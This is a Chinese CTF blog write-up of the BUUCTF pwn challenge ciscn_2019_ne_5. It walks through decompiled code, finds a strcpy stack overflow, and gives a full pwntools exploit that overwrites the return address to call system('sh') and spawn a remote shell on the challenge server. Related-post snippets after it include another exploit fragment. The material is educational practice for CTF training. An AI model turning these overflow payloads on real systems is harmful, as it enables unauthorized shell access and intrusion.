ciscn_2019_ne_5

最新推荐文章于 2023-09-05 12:45:00 发布
最新推荐文章于 2023-09-05 12:45:00 发布
阅读量279 收藏
点赞数
分类专栏: BUU-PWN 文章标签: pwn python CTF WriteUp 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/123885680
版权

ciscn_2019_ne_5

使用checksec查看:
在这里插入图片描述

只开启了栈不可执行。

先放进IDA中分析:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // [esp+0h] [ebp-100h]
  char src[4]; // [esp+4h] [ebp-FCh]
  char v5; // [esp+8h] [ebp-F8h]
  char s1[4]; // [esp+84h] [ebp-7Ch]
  char v7; // [esp+88h] [ebp-78h]
  char *v8; // [esp+E8h] [ebp-18h]
  int *v9; // [esp+ECh] [ebp-14h]
  int *v10; // [esp+F4h] [ebp-Ch]

  v10 = &argc;
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  fflush(stdout);
  *(_DWORD *)s1 = 48;
  memset(&v7, 0, 0x60u);
  *(_DWORD *)src = 48;
  memset(&v5, 0, 0x7Cu);
  puts("Welcome to use LFS.");
  printf("Please input admin password:");
  __isoc99_scanf();
  if ( strcmp(s1, "administrator") )
  {
    puts("Password Error!");
    exit(0);
  }
  puts("Welcome!");
  while ( 1 )
  {
    puts("Input your operation:");
    puts("1.Add a log.");
    puts("2.Display all logs.");
    puts("3.Print all logs.");
    printf("0.Exit\n:");
    v9 = &v3;
    v8 = "%d";
    __isoc99_scanf();
    switch ( v3 )
    {
      case 0:
        exit(0);
        return;
      case 1:
        v8 = src;
        AddLog();
        break;
      case 2:
        Display(src);
        break;
      case 3:
        Print();
        break;
      case 4:
        GetFlag(src);
        break;
      default:
        continue;
    }
  }
}
  • __isoc99_scanf();:首先需要输入admin的密码,下面已经给出了密码if ( strcmp(s1, "administrator") )
  • 进入主程序后有4个选项,来一个一个分析。

AddLog()
在这里插入图片描述

  • return __isoc99_scanf();:接受用户输入的数据。

Display(char *s)
在这里插入图片描述

  • 打印。

Print()
在这里插入图片描述

  • 没啥用

GetFlag(char *src)
在这里插入图片描述

  • strcpy(dest, src);:将用户之前输入的数据放到dest变量中。

题目思路

  • 先用密码administrator过了第一关。

  • 第二次用户输入的时候没有限制输入的数据大小。

  • 将用户之前输入的数据放到dest变量中时候发现,变量dest距离ebp0x48,存在栈溢出。

  • 程序中存在system()函数。

  • 程序中也有sh字符串可以利用。

  • 通过栈溢出getshell。

步骤解析

刚开始用IDA打开的时候会有如下报错:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AM6QBYWX-1648737462527)(ciscn_2019_ne_5.assets/image-20220331223059541.png)]

定位到0x8048801之后,双击___isoc99_scanf,定位到___isoc99_scanf()函数后用F5反编译下回到main()函数重新F5反编译即可编译成功。

在查找字符串的时候会发现没有/bin/bash字符串,但是会发现fflush字符串,sh在结尾,可以拿来使用,作为system()的参数。

完整exp

from pwn import *

#start
r = remote("node4.buuoj.cn",25238)
# r = process("../buu/ciscn_2019_ne_5")
elf = ELF("../buu/ciscn_2019_ne_5")

#params
system_addr = elf.symbols['system']
bin_sh_addr = 0x80482E6 + 4

#attack
r.sendlineafter("password:","administrator")
r.sendlineafter(':','1')
payload = b'M'*(0x48+4) + p32(system_addr) + b'M'*4 + p32(bin_sh_addr)
r.sendlineafter('info:',payload)
r.sendlineafter(":","4")

r.interactive()
m0sway
关注
专栏目录
UEFITool_NE_A51_win32.zip
12-24
5. **引导加载器配置**:UEFITool可以用于配置和管理不同的引导加载器,比如GRUB2或Windows Boot Manager,确保系统能够正确启动。 6. **安全启动管理**:对于支持安全启动的系统,UEFITool可以帮助用户管理安全...
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1716
buuctf ciscn_2019_ne_5题目分析
ciscn_2019_ne_5【BUUCTF
qq_41696518的博客
08-31 600
ciscn_2019_ne_5 BUUCTF
[PWN]ciscn_2019_ne_5
LDX的博客
11-27 290
PWN ciscn_2019_ne_5
【BUUCTFPWNciscn_2019_ne_5
m0_55368674的博客
01-15 208
【BUUCTFPWNciscn_2019_ne_5
110m_physical_地图_ne_110m_graticules_世界地图_physical_
09-28
5. ne_110m_glaciated_areas.cpg:冰川覆盖区的数据,对于研究气候变化和冰川退缩情况至关重要。 6. ne_110m_ocean.cpg:海洋的栅格数据,标识出海洋边界和深度。 7. ne_110m_coastline.cpg:海岸线数据,定义了陆地...
ATOS.rar_ATOS NE_Atos
09-19
5. **调试和测试**:在实际开发过程中,学会使用Atos提供的调试工具,如日志记录、模拟器和硬件调试器,以便于查找和解决问题。 6. **软件开发流程**:理解敏捷开发方法,如何编写测试用例,以及版本控制工具(如...
ciscn-2019-ne-3
11-08
【标题】"ciscn-2019-ne-3" 指向的可能是一个网络安全竞赛或挑战,其中 "ciscn" 可能代表 China International Security Conference Network 或类似的网络安全活动,而 "2019-ne-3" 也许是该活动2019年中的第三个...
NE2000_DRIVER.rar_NE2000
09-23
如题 这是一个NE2000的驱动开发程序历程,里面包含了代码和开发过程,读者可以自己整理一下 很容易
ciscn_2019_n_5
、moddemod
06-17 334
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
CTFciscn_2019_n_5
凉水的博客
04-22 996
题目分析 1 反编译,寻找可以利用的地方 main函数的反编译结果如下: int main(void) { 1 char text [30]; 2 setvbuf(stdout,(char *)0x0,2,0); 3 puts("tell me your name"); 4 read(0,name,100); 5 puts("wow~ nice name!"); 6 puts("What do you want to say to me?"); 7 gets(text);
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 852
[buuctf]ciscn_2019_n_5
[CTF] ciscn_2019_ne_5
凉水的博客
06-13 517
ciscn_2019_ne_5
BUUCTF-ciscn_2019_n_51
Rt1Text的博客
10-09 339
没有开启保护,有可写segments,考虑shellcode。
BUUCTF ciscn_2019_ne_5 & jarvisoj_fm
红叶的博客
11-01 736
只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。
[BUUCTF]PWN——ciscn_2019_ne_5
wuyvle的博客
02-09 186
放进Linux一看是32位 进入ida对main不能直接F5 先进入scanf函数编译,再编译main 我们发现这是一个菜单表,输入administrator后进入菜单,而且这里s1只给了48个大小,而可以输入100个字节,可以溢出 我们进菜单1看看 看看菜单3 找到system函数了,接下来找到system地址和/bin/sh的地址 from pwn import* r=remote("node3.buuoj.cn",29791) elf=ELF('ciscn_2019_ne_5') syste
[CISCN 2019华北] PWN5(ciscn_2019_n_5) 复现
Xzzzz911的博客
09-05 1186
此题我认为需要认真分析伪代码,发现其漏洞和一些重要信息,并且需要了解怎么构造shellcode和构造rop执行流,这些都是比较基础的知识点,最后 法二 和 法三 构造exp有些不同点,可以尝试对比一下,你应该会收获不少(上述为个人看法,如有不对,希望各位师傅指正)
EXPECT_NE()函数
最新发布
07-09
EXPECT_NE()是Google Test框架(gtest)中的一个断言宏,它用于测试两个操作数是否不相等。当你编写单元测试时,如果预期两个值应该不一样,你可以使用EXPECT_NE表达这个期望。它的基本语法如下: ```cpp ASSERT_EQ(expected_value, actual_value); // 或者 EXPECT_EQ(expected_value, actual_value); // 对应于不等于的情况就是: ASSERT_NE(expected_value, actual_value); // 或者 EXPECT_NE(expected_value, actual_value); ``` 在这个例子中,`expected_value`是你认为应该不会相等的值,而`actual_value`是在运行时实际得到的值。如果`actual_value`确实与`expected_value`不同,那么这个断言会通过,测试继续执行;如果它们相等,那么就会触发失败,并显示一个错误消息,指出哪一行的测试条件未满足。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值